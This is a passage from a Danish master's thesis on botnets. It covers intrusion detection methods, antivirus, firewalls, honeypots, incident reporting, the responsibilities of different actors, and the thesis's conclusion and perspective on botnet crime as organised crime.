Detekteringen kan ske ved hjælp af en eller flere af disse detekteringsmekanismer: Signaturebased detection, anomaly-based detection og stateful protocol analysis. En signatur-baseret
detektering anvender forskellige slags mønstre fra velkendte trusler. Dette kan både være at
stoppe e-mail-phishing-forsøg med velkendte emnefelttekster og vedhæftninger, eller ved at
detektere skadeligt indhold direkte i programkode ud fra databaser over kendte trusler. Et
andet eksempel kunne være, at der bliver forsøgt oprettet en telnet-forbindelse til root, der
sandsynligvis vil være et brud på sikkerhedspolitikken [10]. Signaturbaseret detektering ville
dermed kunne spore og forhindre, at ofrene eksempelvis eksekverer en kendt malware,
eksempelvis ZeuS’s Zbot fra figur ni, der ellers ville tilføje computeren til et ZeuS botnet.
Anderledes er det med anomaly-based detection, der undersøger om en given hændelse
afviger fra, hvad der anses for værende normal aktivitet. Dette kræver, at der indledningsvis
oprettes et profilbillede af den normale adfærd fra brugere, applikationer, computere og
netværket, en såkaldt training period [10]. Herefter er systemet i stand til at anvende
ITU
51
statistiske metoder til at undersøge, om den aktuelle drift afviger tilstrækkeligt fra profilbilledet. Er dette tilfældet, genereres en alarm, som meddeles til en administrator og den
mistænkelige trafik bliver efterfølgende forsøgt blokeret. I modsætning til den signaturbaserede detektering, kan dette system altså opfange zero day attacks, såfremt det afviger
tilstrækkeligt fra den normale drift. Dette kan være et brugbart værktøj i forbindelse med
botnet-detektering, da botnet-aktivitet højst sandsynligt vil afvige fra den normale drift. Hvis
der eksempelvis sendes store mængder e-mails fra samme person, eller der oprettes mange
nye netværksforbindelser til mistænkelige IP-adresser, vil dette sandsynligvis udløse en alarm.
Det kan dog vise sig at være problematisk at generere et godt profilbillede under training
period, der kan tage dage såvel som uger [10], fordi virksomheders computeraktivitet kan
variere bemærkelsesværdigt. Hvis eksempelvis en virksomhed opretter backup af deres data
få gange om måneden, og dette ikke har ligget inden for training period, vil denne aktivitet
efterfølgende udløse en alarm. Omvendt set, hvis denne backup registreres som normal
aktivitet, kan kopiering og overførsel af store mængder data i ondsindet øjemed blive
accepteret og tilladt af systemet. I visse tilfælde kan en administrator manuelt redigere i
profilbilledet og tilføje regler til sådanne situationer. Men som eksemplet ovenfor viser, kan det
være en ret kompleks opgave og i visse tilfælde yderst problematisk. Profilbilledet kan også
opsættes dynamisk, således at normal adfærd gradvist ændrer sig for at matche
virksomhedens forandring. Dette kan dog misbruges af eventuelt ondsindede personer, der
kan sørge for at starte roligt ud og langsomt forøge den ondsindede aktivitet. Desuden kunne
det ligeledes være tilfældet, at en botnet-klient allerede var til stede under træningsperioden,
hvilket ville resultere i, at sådanne aktiviteter er tilladt i systemet fra begyndelsen.
Ligesom med de to ovenstående detekteringsmekanismer, kræver stateful protocol analysis
også, at der på forhånd eksisterer en form for retningslinje for, hvad der er tilladt. I dette
tilfælde kræves der et præfabrikeret regelsæt for, hvordan kommunikation gennem kendte
protokoller bør forløbe, og hvad der anses som værende mistænkeligt. Denne mekanisme er i
stand til at holde styr på, hvilken tilstand protokollen befinder sig i for hver aktiv session.
Dette betyder, at den kan sammenholde kommunikationer mellem parterne og giver dermed
en form for deep packet inspection [10]. I forbindelse med for eksempel FTP-protokollen
betyder dette, at brugere i unauthenticated state kun forventes at benytte simple
kommandoer, som for eksempel USER, PASS og HELP-kommandoerne. Først efter brugeren er
godkendt, accepteres de resterende kommandoer, som eksempelvis GET eller DELETE, som
legale sessioner normalt indeholder. Denne detekteringsmekaniske har dog visse svagheder.
Det kan være meget ressourcekrævende at gennemgå alle sessioner på grund af
kompleksiteten i at sammenholde pakker og analysere dem. Derudover kan denne mekanisme
ikke detektere misbrug, hvis den skadelige trafik overholder protokol-regelsættet. Et eksempel
Daniel Jovanovic
52
på dette kunne være, at sende mange tilladte kommandoer af sted på kort tid, som det ses
med eksempelvis TCP SYN DDoS-angreb.
Sammen giver disse tre detekteringsmekanismer dog et godt værktøj til at detektere og
eventuelt hindre, at computere i første omgang bliver smittet med en botnet-malware eller
anden form for ondsindet hændelse. Er computere allerede inficeret med botnet-malware,
giver IDPS også mulighed for at detektere ondsindede hændelser på netværket og eventuelt
forhindre den skadelige effekt. Ligeledes kan IDPS spore og forhindre, at et netværk bliver
udsat for et botnet-DDoS-angreb fra eksterne kilder og kan dermed beskytte netværket og
virksomhedens drift og produktion.
6.6.2 Antivirus
Et antivirus-program er en applikation installeret på computere, som skal sørge for at
detektere og fjerne softwarebaserede trusler fra den beskyttede computer. Antivirusprogrammer er nok den mest almindelige og lettest tilgængelige metode, til at mindske
malware-relaterede trusler på, og der eksisterer derfor mange forskellige brands og versioner,
som alle forsøger at opnå samme mål [11].
Antivirus-programmets mål forsøges opnået ved at udføre en række forskellige kontroller på
computeren. For at holde computeren fri for malware, skal det først og fremmest sørge for at
kunne scanne kritiske systemkomponenter samt de nødvendige opstartsfiler og boot records
[11]. Det er ligeledes vigtigt at have en såkaldt real-time scanning, således at antivirusprogrammet konstant scanner indkommende og udgående filer fra for eksempel e-mailvedhæftninger eller browserdownloads, men også real-time scanning af programmer og filer
der eksekveres på systemet.
Derudover bør antivirus-programmet være opsat til regelmæssigt at scanne hele computeren
igennem, både hvis brugeren beder om det eller automatisk efter en given tidsplan. For at
antivirus-programmet skal være effektivt kræves yderligere, at den kan detektere alle former
for malware, herunder de klassiske virus, orme, trojanske heste, men også spyware, som for
eksempel keyloggers. Når malwaren er detekteret, skal antivirus-programmet efterfølgende
være i stand til at uskadeliggøre den ondsindede kode ved at placere den i karantæne og
forsøge at desinficere filen eller fjerne den helt fra computeren.
Ligesom med IDPS-systemer kan denne detektering foregå på flere måder. Det kan ske ved
hjælp af signaturbaseret detektering samt mere heuristiske metoder, hvor antivirus-
ITU
53
programmet eventuelt søger efter skadelig kode inde i filen eller simulere eksekvering af filen
og leder efter usædvanlig adfærd [11]. Desværre kan dette i visse tilfælde, ligesom med IDPS
systemer, give falske positiver, hvilket vil sige, at en legitim adfærd bliver klassificeret som en
malware og afvist.
Der kan være stor forskel på de forskellige antivirus-programmer, der bliver udbudt på
markedet i dag. Alle lover det samme og det kan derfor være svært at gennemskue hvilke
antivirus-programmer der kan løse opgaven korrekt og effektivt. Det er derfor vigtigt at
undersøge markedet godt og grundigt, og dermed sikre at den valgte løsning er tilstrækkelig
effektiv.
6.6.3 Firewall
En firewall er et værktøj, der undersøger al trafik ind og ud af den beskyttede enhed og tillader
eller afviser trafikken baseret på nogle prædefinerede regler. Der findes to typer firewalls,
network firewalls og host-based firewalls, også kendt som personlige firewalls [11].
Netværksfirewalls benyttes til at skabe et perimeterforsvar fra eksterne såvel som interne
trusler. En eller flere netværksfirewalls kan placeres forskellige steder i netværket for at opnå
beskyttelse på netværket og dermed de tilhørende computere. Firewallen skal som regel
sættes op til at afvise al trafik, der ikke specifikt er tilladt, herunder også kommunikation til de
porte på systemerne der ikke ønskes anvendt. Firewallreglerne beskriver som oftest, hvad der
er tilladt i forhold til de protokoller, der benyttes, eksempelvis at ekstern e-mail-trafik skal
være tilladt ind til en virksomheds mailserver. Firewallen kan også kontrollere udadgående
trafik, således at hvis en orm eksempelvis har spredt sig til ét netværk, vil den ikke kunne
komme videre til et andet igennem firewallen.
Personlige firewalls er installeret lokalt på de enkelte computere. Disse benyttes ligesom
netværksfirewalls til at kontrollere indadgående og udadgående trafik, men her på systemniveau. Nogle personlige firewalls bruger regler ligesom netværksfirewalls, men de fleste
definerer regler i forhold til applikationer, forstået ved at brugeren vælger, hvilke applikationer
der er tilladt kommunikation med omverdenen. Også her bør al trafik der ikke specifikt er
tilladt, blive afvist, for at sikre at der ikke kommer skadelig trafik ind på computeren, og
efterfølgende at den skadelige kode ikke kan kommunikere videre ud til andre.
Daniel Jovanovic
54
6.6.4 Honeypot
Virksomheder kan også gøre brug af en såkaldt Honeypot eller Honeynet. Disse har det
primære formål at lade sig penetrere og tiltrække den ondsindede opmærksomhed, som
virksomhedens andre computere og netværk ellers ville have fået. Betegnelsen Honeypot
refererer ofte til én enkelt computer, hvorimod Honeynet er et mindre netværk af computere
[18]. Begge er designet, så de fremstår som computere eller netværk med sårbarheder, som
udadtil virker tiltrækkende for hackere, der har fundet vej til virksomheden. Disse kan
opsættes i to varianter, Research og Production. Research-varianten er tiltænkt virksomheder
eller personer, der ønsker at studere malwaren nærmere, og er derfor ikke interesseret i at
hackeren opdager, at det er en honeypot, og derfor stopper den ondsindede gerning. Der sker
en stor dataindsamling med al den information, der efterlades samt logning af de handlinger
og værktøjer hackeren benytter. Dette giver efterfølgende forskere mulighed for at analysere
data og følge med i udviklingen på blackhat-siden af it-sikkerhed. Ydermere giver det mulighed
for at udvikle effektive modmidler mod hackernes værktøjer og angreb. Production-varianten
er derimod tiltænkt miljøer, hvor virksomheden kun er interesseret i at fjerne truslen fra deres
produktion. Disse fungerer oftest også som almindelige IDS’ere, ved at registrere truslen når
den opstår og meddele dette til en administrator. Ligegyldigt om hackeren opdager, at han er
blevet narret eller ej, har honeypoten tjent sit formål ved at tiltrække den skadelige trafik og
dermed give en advarsel til virksomheden om at beskytte deres oprindelige netværk mod den
specifikke trussel.
Begge varianter kan være interessante i forbindelse med botnet-bekæmpelse. Selvom de ikke
direkte kan forhindre angreb, kan de give systemadministratorerne i eksempelvis produktionsvirksomheder en tidlig advarsel, således at man kan tage de nødvendige forholdsregler for at
undgå at blive ramt af en botnet-inficering, eller eventuelt viden om hvordan man slipper af
med den. Ligeledes kan det for en it-sikkerhedsvirksomhed eller antivirus-producent være
meget interessant at lade hackeren udføre sin gerning på en honeypot, således at de kan
indsamle viden og dermed blive bedre i stand til at udarbejde modmidler og opdateringer.
Kender man sine fjender, deres intentioner samt våben, er det nemmere at reagere og
eventuelt forhindre et angreb. Det er denne type informationsindsamling, der er med til at
opretholde et realistisk og nutidigt trusselsbillede af malware-markedet i dag. Dette kan dog
vise sig besværligt og i visse tilfælde umuligt i forbindelse med botnets, hvor kontrolkanalen
og trafikken kan være krypteret. I sådanne situationer vil man muligvis have identificeret, at
der befinder sig en botnet-malware, men efterfølgende vil man måske ikke altid være i stand
til at kunne analysere den i dybden, medmindre man kender eller kan fremskaffe den
tilsvarende nøgle.
ITU
55
6.6.5 Udfordringer med ovenstående værktøjer
Der eksisterer en række udfordringer og problemer med ovenstående værktøjer. Sættes de
korrekt op og vedligeholdes kan de hjælpe til en øget beskyttelse mod botnets og malware.
Men nogle af de ovenstående løsninger er i høj grad rettet mod virksomheder og
organisationer, som har dedikerede ressourcer til at købe og implementere værktøjerne
korrekt. Antivirus-programmer og firewalls kan i nogen grad godt administreres af private
personer og installeres på deres computere, men IDPS-systemer, honeypots / honeynets og
netværks-firewalls må anses som værende udviklet til at beskytte større og mere komplekse
netværk. Altså ses det problem, at private personer næppe har ressourcerne eller know-how til
at implementere ovenstående systemer og dermed eventuelt ikke er ligeså godt beskyttet.
Ligeledes eksisterer der et problem i forbindelse med den tendens, der ses på malware
markedet i dag. Malware-udviklingen er gået fra, at man før i tiden havde en overskuelig
mængde af malware, der spredte sig i stort tal, til at man i dag ser en ekstremt stor mængde
forskellige malware, der hver især er mindre udbredte [33]. Dette forstærkes yderligere af de
mekanismer, der eksisterer for malware til at beskytte sig selv, polymorphism og metamorphism som nævnt i afsnit 3.5, hvor signaturer kan ændre sig for samme malware. Dette er
en udfordring for den signaturbaseret detektering i IDPS-systemer og antivirus-programmer,
hvilket blev bekræftet i en undersøgelse af 13 forskellige antivirus-programmer. Her kom det
frem, at kun 19 pct. af 1700 malware-filer i gennemsnit blev opdaget og klassificeret af de 13
antivirus-programmer [34]. Det vil sige, at der passerer rigtig meget malware igennem uden
at blive detekteret af antivirus-programmer, der kun anvender signaturbaseret detektering.
Dette betyder, at det er en stadigt stigende og sværere opgave for antivirus- og IDPSproducenter at opretholde et dækkende trusselsbillede og kunne beskytte brugerne. Derfor bør
signaturbaseret detektering aldrig stå alene, men bør kombineres med flere mekanismer, som
også undersøger og klassificerer mistænkelig adfærd.
Hvis der anvendes mekanismer til detektering af mistænkelig adfærd, kan der opstå falske
positiver. Da disse kan være yderst ubelejlige eller irriterende for systemadministratorer og
brugere, ses det, at denne mekanisme i visse tilfælde ignoreres eller ikke anvendes i
tilstrækkelig grad, hvilket naturligvis øger risikoen for, at skadelig kode og malware inficerer
de beskyttede computere.
Daniel Jovanovic
56
6.7 Hvad skal man gøre under angreb
Bliver man udsat for it-relaterede angreb eller truet med det, bør man først og fremmest sikre
sig, at man har de rette tekniske modmidler, som beskrevet ovenfor. Korrekt opsætning af
værktøjer som IDPS og firewalls kan i nogle tilfælde succesfuldt bortfiltrere den skadelige
trafik og beskytte imod angreb. Lykkes dette ikke, må man søge hjælp fra ekstern part.
Opstår der it-sikkerhedsmæssige hændelser, kan disse anmeldes til politiet, nærmere betegnet
Rigspolitiets Nationale IT-Efterforskningscenter. Dette center bistår landets politikredse med at
sikre elektroniske beviser angående hacking og dermed ulovlig indtrængen i it-systemer.
Hvordan anmeldelsen behandles af politiet afhænger af sagens natur og bliver ikke uden
videre oplyst.
Herefter bør man anmelde angrebet til overvågningstjenesten DK-CERT. DK-CERT har som
instans ingen direkte myndighed, men kan hjælpe med rådgivning af, hvordan angrebet kan
bringes til ophør, samt hvordan man fremover opnår en bedre beskyttelse. Derudover vil
anmeldelsen hjælpe DK-CERT med at opretholde et realistisk trusselsbillede og kan gøre det
muligt at advare andre mod lignende angreb. Med hjælp fra denne instans kan der eventuelt
forsøges at få internetudbyderen til at null-route den skadelige trafik, altså omdirigere
trafikken væk fra målet og ud til ingenting, og dermed undvige angrebet.
Fejler ovenstående procedurer, og er man stadig under angreb, kan man som privat person
eller virksomhed ikke stille meget mere op. Man må vente til efterforskningen, eventuelt på
internationalt niveau, bærer frugt og får stoppet for angrebet. I mellemtiden må virksomheder
under angreb sørge for at iværksætte deres it-beredskabsplaner, der eventuelt beskriver,
hvordan de kan fortsætte med at drive forretning af andre kanaler, således at man kan
overleve et angreb.
ITU
57
6.8 Sammenfatning
At være beskyttet mod botnets kræver mere end blot at installere et beskyttende værktøj og
regne med, at man nu er beskyttet. Selv i de tekniske modmidler kan der eksistere
sårbarheder som kan udnyttes, og desuden kan Social Engineering anvendes til at snyde
brugerne til at omgå disse. Det er derfor vigtigt at holde alle applikationer fuldt opdateret samt
oplæring i at kunne identificere mistænkelig indhold på internettet.
Set ud fra virksomheder og organisationers synspunkt er det vigtigt at have it-sikkerhedspolitikker og beredskabsplaner for, hvordan sikkerhedshændelser undgås, og hvordan man
skal reagere, hvis angreb alligevel sker. Herunder skal der også eksistere en form for
gennemgående træning af personale med henblik på at kunne beskytte sig mod Social
Engineering, men også for at sikre at mennesker bruger deres sunde fornuft på internettet.
Spam og phishing bliver eksempelvis anvendt til at lokke brugere til at eksekvere filer og
trykke på links, der eventuelt indmelder offeret i et botnet, som er et scenarium man bør
kunne beskytte sig imod og dermed undgå.
På nationalt såvel som på internationalt niveau bør der eksistere en form for it-politi, der er i
stand til at rykke ud, når disse trusler opstår. Teknologien tillader i nogle tilfælde, at man kan
finde frem til eksempelvis C&C-servere, men der skal også være myndighed til at kunne lukke
dem ned hurtigt. Sådanne tiltag diskuteres og det er nu blevet besluttet at oprette et
europæisk Cyber Crime Center i starten af år 2013, der skal tage kampen op mod kriminalitet
på internettet [41]. Etableres dette center med den rette myndighed, som dette speciale
beskriver, vil det være et godt skridt på vej mod effektiv botnet-bekæmpelse.
Daniel Jovanovic
58
Kapitel 7
Hvem har ansvaret
Det eksisterer ikke én enkelt aktør, der kan siges at have ansvaret for at håndtere den
kriminalitet, der opstår i forbindelse med botnets. Oftest kræves der flere instanser for at
kunne løse eller mindske problemet. Dette kapitel beskriver disse forskellige instanser, og
hvordan de hver især kan bidrage til at løse problemet.
Politikere både i Danmark og resten af verden har et ansvar for at sørge for, at der eksisterer
en lovgivning, som er tilstrækkeligt dækkende og effektiv. For at man i første omgang kan
bruge ressourcer på at bekæmpe og forhindre botnets, kræves det, at botnet-aktivitet
forbindes med noget kriminelt i loven, så der kan hentes en strafhjemmel. Da Danmark har
udarbejdet straffeloven i en teknologineutral ordlyd, vil de nuværende love i de fleste tilfælde
kunne tolkes til at være dækkende. Dog udledes, at som den danske lov er udarbejdet i dag,
er den kun dækkende i forhold til kriminalitet begået i Danmark. Men da botnets i høj grad er
et globalt problem, hvor bagmænd eventuelt befinder sig i lande som Rusland og Kina, er det
tvivlsomt, at den danske straffelov kan hjælpe. Det er altså både vigtigt, at loven bliver
tilpasset i takt med teknologiudviklingen, men også at der bliver udarbejdet internationale love
og samarbejdsaftaler angående it-kriminalitet. Da dette kan være en tung og tidkrævende
opgave, kan det ikke forventes at være de enkeltes politikeres ansvar at løse dette problem.
På europæisk plan varetages disse opgaver derfor blandt andet af kommissioner. I forbindelse
med Europa-Kommissionens ”Digital Agenda for Europe” blev det besluttet, at EU-medlemslandenes forsvar mod it-kriminalitet skulle forstærkes, herunder effektivt forsvar mod digitale
angreb på vigtige informationssystemer [38]. Dette ønskes løst med anbefalingen om at styrke
og modernisere ”European Network and Information Security Agency”, herefter ENISA. ENISA
skal sørge for at udvikle og give ny ekspertise på it-sikkerhedsområdet til EU-institutioner
samt EU-medlemslandenes regeringer, der igennem samarbejde med hinanden skal forstå og
beskytte sig bedre mod de nye it-trusler [39]. ENISA’s arbejdsplan for 2012 er blandt andet at
forsøge at øge samarbejdet mellem medlemslandende, EU-institutioner og andre organer samt
EuroPol, som er et operationelt retshåndhævelsesvæsen i Europa [29]. Dette samarbejde er
nødvendigt for effektivt at kunne foretage botnet-bekæmpelse.
ITU
59
Herudover eksisterer der danske organisationer, der fungerer som varslingstjenester for
internettrusler med fokus på både statslige institutioner samt virksomheder og borgere. Deres
ansvar er at undersøge internettet, opretholde et korrekt trusselsbillede og videregive disse
informationer for at oplyse interessenter. GovCERT hjælper til, at der i staten er et overblik
over trusler og sårbarheder i forbindelse med internettet. Dette bevirker at staten er i stand til
at tage de nødvendige forholdsregler, i tilfælde af at der eksempelvis identificeres sårbarheder
i anvendte systemer, som skal opdateres og dermed lukkes. DK-CERT overvåger ”Forskningsnettet” og rådgiver løbende, om hvordan borgere og virksomheder kan beskytte sig. Dette gør
de ved at offentliggøre artikler og årsrapporter med advarsler og analyser. De arbejder
ligeledes sammen med GovCERT samt udenlandske organisationer for at opnå det mest
dækkende og nutidige trusselsbillede. Begge har dog kun en rådgivende rolle uden myndighed
og arbejder derfor i tæt kontakt med blandt andet politiet og internet-udbydere for at få
foretaget de nødvendige handlinger for at beskytte danskernes IT.
De danske internetudbydere som sørger for at opkoble danskere på internettet, har adgang til
al den trafik, der sendes og modtages fra hver enkelt internetopkobling. Dette kan anvendes til
at foretage trafikanalyse og dermed eventuelt detektere, om nogle af disse opkoblinger
benyttes til at sende botnet-trafik. Det kan derfor diskuteres, om internetudbyderne har et
ansvar i at holde øje med alle opkoblinger og give information til de brugere, der er inficeret,
da de sandsynligvis ikke selv er klar over det. Dette vil kræve ekstra ressourcer af internetudbydere, hvilket sandsynligvis vil medføre, at internetudbydere ville ignorere opgaven,
grundet den konkurrence der ses, hvor internetudbydere forsøger at presse prisen i bund ved
at skære alle unødvendige ekstra services væk. Kommer der derimod en lov, der forpligter
internetudbydere til at udbyde denne service, vil der være et incitament for at udføre denne
kontrol for at undgå straf i form af eksempelvis bøder. Uanset hvordan det realiseres, vil en
sådan kontrol, i samarbejde med andre tiltag, sandsynligvis kunne benyttes til effektiv botnetbekæmpelse, som det for eksempel er set i Japan med deres Cyber Clean Center.
Virksomheder er selv ansvarlige for i første omgang at have en fornuftig it-sikkerhedspolitik.
Denne skal både være bredt dækkende samt dybdegående, og beskrive hvordan trusler kan og
skal undgås. Dernæst er det også vigtigt, at virksomheder uddanner deres personale i itsikkerhed. Dette gælder både for at sikre, at personalet ikke bliver udsat for Social Engineering
og lader kritisk information lokke ud af sig, men også for at undgå at de ansatte selv ubevidst
installerer malware på deres computere. Virksomheder skal også sørge for at operativsystemet
og andre applikationer holdes opdateret, således at sikkerhedshuller og andre sårbarheder
lukkes, så snart de bliver opdaget for at forhindre angreb. Derudover er det også
virksomheders eget ansvar, at opbygge et godt teknologisk forsvar med de værktøjer der er til
Daniel Jovanovic
60
rådighed. Disse bør inddrages på det dybeste niveau, forstået således at it-sikkerhed skal
inddrages i designfasen, når virksomheders infrastruktur planlægges og implementeres. Dette
vil ofte være inkorporeret i en it-sikkerhedspolitik. Det er ligeledes altid en god ide at have en
risikoanalyse, der beskriver, hvilke risici der kan forventes på virksomheders IT, samt hvor
kritiske og sandsynlige de er. Dette hjælper til at virksomheder bedre er i stand til at
identificere, hvilke risici der er kritiske, og som kræver modmidler.
I sidste ende er ethvert menneske ansvarlig for deres egen handling på internettet. På trods af
at der eksistere avancerede værktøjer mod it-kriminalitet og malware kan man ikke gardere
sig fuldstændigt. Det er menneskeligt at fejle, og det kan ske, at man for eksempel bliver
fristet til at trykke på et skadeligt link eller ved et uheld får installeret skadeligt software.
Dette kan dog afhjælpes ved, ligesom med virksomheder, at have installeret de nyeste
opdateringer til sin software samt at have installeret effektive antivirus-programmer og
firewalls. Derudover bør man altid bruge sin sunde fornuft på internettet og ikke lade sig snyde
af links, der lover noget, der er for godt til at være sandt.
Undersøgelser har vist, at der ved 63 pct. af alle overordnede it-angreb kunne have været
etableret simple og billige modmidler, som eventuelt kunne forhindre angrebet [12]. Kun 33
og fire pct. af angrebene ville kræve udvidet eller avancerede modmidler at forhindre.
Figur 21. Omkostning af beskyttende modmidler i forhold til succesfulde angreb. Kilde [12]
Dette beviser, at årsagen til succesfulde it-angreb ofte skyldes, at private personer, såvel som
virksomheder og organisationer, ikke beskytter deres IT, selv med de nemmeste og billigste
modmidler der eksisterer, herunder både adfærdsmæssig oplæring samt tekniske værktøjer.
Bliver der sørget for oplæring af personale og indført tilstrækkelige gode passwords, samt
installeret gode antivirus- og firewall-produkter, burde det være muligt at mindske det
samlede antal af succesfulde it-relaterede angreb.
ITU
61
Kapitel 8
Konklusion
Et botnet kan kaldes en hybrid mellem flere typer malware, der kombineret giver mulighed for
at udnytte en række inficerede computeres ressourcer. Dette speciale definerer derfor botnets
som en mængde af kompromitterede computere, der kan kontrolleres af en eller flere
ondsindede personer. Arkitekturen bag botnets kan overordnet set bygge på to principper:
centraliserede botnets, hvor der eksisterer én server og flere bot-klienter, og decentraliserede
botnets, hvor alle parter kan kommunikere indbyrdes med hinanden. Botnettet kan udvides og
sprede sig til nye ofre igennem flere spredningsvektorer, herunder anden malware, spam,
Social Engineering m.m. Botnets er mest kendt for at være brugt til udsendelse af spam,
indsamling af informationer samt Distributed Denial of Service angreb. Grundet alvorligheden
af disse anvendelsesmuligheder, er der fokus på at beskytte sig mod botnets og nedlægge
aktive botnets. Derfor har botnet-designere indført en række teknikker for at beskytte disse
botnets. Der anvendes arkitekturer, der gør det sværere at lukke ned for kontroltrafikken,
ligesom at kommunikationen bliver krypteret og verificeret for at undgå, at botnet-bekæmpere
kan overtage kontrollen.
Kriminelle har indset, at botnets kan benyttes som værktøj i flere kriminelle henseender, og
trusler fra botnets er derfor højaktuelt i vores moderne verden. Dette speciale kategoriserer
disse i tre overordnede kriminelle hensigter: Berigelsesforbrydelser, hacktivism og cyber
warfare. Botnets anvendes i dag som alternativ til organiseret kriminalitet, da risikoen for at
blive fanget er mindre end ved eksempelvis narkotikahandel og prostitution. I denne
forbindelse kan bagmænd både benytte botnets til at indhente eksempelvis kreditkortinformationer fra ofrene og derigennem opnå gevinst, eller true et offer med et DDoS-angreb
og forlange løsesum. Botnets kan også anvendes som værktøj til at skabe opmærksomhed om
en politisk agenda. Hacktivistbevægelsen Anonymous, der kæmper for frihed på internettet,
udfører jævnligt operationer i forbindelse med områder, som de vurderer som brud på vores
frihed. Anonymous er i stand til at motivere mennesker på internettet til at støtte dem i deres
sag ved frivilligt at melde sig ind i et botnet. Herefter kan det frivillige botnet benyttes til at
angribe målene for deres operationer og dermed opnå opmærksomhed fra omverdenen, der er
et vigtigt mål med hacktivism. Endelig er botnets også set i nationers krigsførelse mod
Daniel Jovanovic
62
hinanden. Det nok mest aktuelle og omdiskuterede eksempel er fra år 2007, hvor Estlands
økonomiske og politiske infrastruktur på internettet blev ramt af massive DDoS-angreb.
Baggrunden for angrebet er ikke bevist, men stammer sandsynligvis fra hackergrupper i
Rusland, der med eller uden national opbakning har udført angrebet. Det ses altså, at botnets
kan anvendes til krigsførelse som alternativ til konventionelle våben, idet fjender kan angribe
hinandens kritiske infrastruktur på internettet. Botnets skal derfor ses som en alvorlig trussel i
vores moderne verden, som bliver stadig mere online og digital.
For at imødekomme disse trusler beskriver dette speciale hvad der kan gøres og hvem der har
ansvaret. Nationer har hver deres lovgivning, der kan benyttes til at indhente strafhjemmel i
forbindelse med it-kriminalitet, men dette må siges at være en langsigtet løsning. Desuden er
det problematisk at benytte eksempelvis den danske lovgivning, da botnets kan spænde sig
over flere lande og dermed flere jurisdiktioner. Der er altså brug for et globalt it-politi, der har
myndighederne samt ressourcerne til at rykke hurtigt ud og reagere på botnet-aktivitet. Et
sådant politi er på tegnebrættet og burde stå klar i år 2013. Andre nationale tiltag er set,
eksempelvis Japans Cyber Clean Center, hvor internetudbydere via trafikanalyse kan se, hvilke
kunder der er inficeret. Herefter kan de informere deres kunder om inficeringen og
efterfølgende hjælpe dem med at desinficere deres computere. Derudover er det vigtigt, at
virksomheder og organisationer sørger for at have it-sikkerhedspolitikker for deres ansattes
adfærd på internettet. Personale bør modtage træning i at identificere forsøg på inficering og
ikke lade sig narre af Social Engineering-angreb. Derudover bør der eksistere it-beredskabsplaner for at sikre, at virksomheder kan handle hurtigt i tilfælde af trusler eller angreb fra
botnets. Til sidst skal virksomheder naturligvis også sørge for at have de nødvendige og
tilstrækkeligt gode tekniske værktøjer, herunder IDPS, antivirus, firewall og eventuelt
honeypots.
Dette speciale har vist, hvordan det tekniske grundlag for botnets ser ud, herunder
udarbejdelsen af et eksempel i pseudokode. Derudover har en analyse beskrevet hvorledes
botnets benyttes i forbindelse med forskellige former for it-kriminalitet med forskellige
hensigter og ressourcer bag. Afslutningsvis har dette speciale beskrevet, hvordan botnetaktivitet kan spores og forhindres, herunder hvilke interessenter der har et ansvar, samt hvad
de hver især kan gøre. Dermed har dette speciale besvaret alle de opstillede analysespørgsmål
fra problemformuleringen. Specialet kan herefter bruges aktivt i forbindelse med botnetbekæmpelse og som fundament til fremtidig forskning om emnet.
ITU
63
Kapitel 9
Perspektivering
Ud fra dette speciales konklusioner bør botnets som værktøj til it-kriminalitet blive betragtet
som et voksende problem, der kræver fokus. Virksomheder og organisationer har siden
1980’erne måtte tage højde for, at der fandtes ondsindet kode, der potentielt kunne skade
deres IT, men udviklingen har gennem de sidste tre årtier været meget stor. Ressourcerne bag
datidens malware var oftest ret små, og malware blev overvejende betragtet som værktøj til
at opnå berømmelse samt anerkendelse i undergrundsmiljøer. Billedet af unge mænd der
udvikler malware i deres forældres kældre, med motivet fordi vi kan, er muligvis stadig
fejlagtigt det billede, der dominerer hos nogle virksomheder. Botnets bliver derfor måske
stadig anset som værende endnu en form for triviel malware, der ikke kræver specielle
forholdsregler. Dette speciale har dog bevist, at situationen er en helt anden.
Specialet anbefaler at botnets bliver kategoriseret som værende et seriøst værktøj til
organiseret kriminalitet og at de bør behandles derefter. Kriminelle udnytter, at botnets er et
mere sikkert alternativ til eksempelvis at opnå økonomisk gevinst, i forhold til traditionel
organiseret kriminalitet som narkotikahandel eller prostitution. I modsætning til den tidligere
opfattelse om malware, bør det nu derfor i højere grad betragtes som værende en illegal
industri, hvor bagmændene kan have store ressourcer bag sig samt målrettede og specifikke
agendaer. Derfor kan der argumenteres for, at der med brugen af botnets til organiseret
kriminalitet er sket et paradigmeskift. Malware kan nu også anvendes til både berigelsesforbrydelser med store summer involveret, hacktivism med politiske og ideologiske agendaer
samt til cyber warfare, som kan angribe nationers kritiske infrastruktur. Denne udvikling er
bekymrende og kræver fokus fra alle internettets interessenter.
Specialet redegør for, at alle brugere af internettet har et ansvar for at mindske eller eliminere
botnet-kriminalitet. Politikere på såvel nationalt som internationalt niveau bør arbejde hårdere
på at etablere international enighed om en fælles it-sikkerhedsstrategi. Herunder også
etablering af et international it-politi, der har de rette myndigheder til at agere på globalt plan.
Derudover har virksomheder og private også et vigtigt ansvar for til enhver tid at beskytte
deres IT mod malware. Gennem regelmæssige opdateringer af software samt anvendelse af
Daniel Jovanovic
64
teknologiske modmidler, kan man mindske risikoen for at blive en del af et botnet. Ved at
effektivisere sit digitale forsvar forringes altså den størrelse et botnet potentielt ville kunne
opnå, hvilket dermed mindsker truslen fra botnets. Det er derfor meget vigtigt, at der bliver
skabt opmærksomhed på at holde computere beskyttet, og at internetbrugere anvender deres
sunde fornuft på internettet.
Det kan dog vise sig at være problematisk at motivere virksomheder og private til at sikre
deres IT tilstrækkeligt. Set i dette perspektiv kan man tolke nutidig botnet-kriminalitet som et
samfundsproblem, idet selv enkelte computere der inficeres med en botnet-malware kan være
skyld i, at malwaren spreder sig til en større gruppe. I den forbindelse er det interessant at
sammenligne botnet-aktivitet med eksempelvis miljøforurening som CO2-udslip eller forurening
af grundvandet. Forurenes vores miljø, kan der idømmes bøder eller andre former for
sanktioner, hvilket resulterer i, at man er mere påpasselig for at undgå straf. Til en vis grad
kan man definere botnet-trafik som forurening af internettet, og det kan derfor diskuteres, om
man skal kunne straffe individer, der ikke sørger for at have de rette modmidler. Uden disse
kan man eventuelt være skyld i, at andre computere smittes, hvilket kan skabe en
eksponentiel stigning af botnet-inficiering. Det kan diskuteres, om vores samfund er parat til
en sådan form for lovgivning og kontrol, men når der findes lovkrav om brugen af godkendte
partikelfiltre til tunge køretøjer, hvorfor så ikke også indføre krav om effektive antivirus- og
firewall-produkter på vores computere?
ITU
65
Appendiks
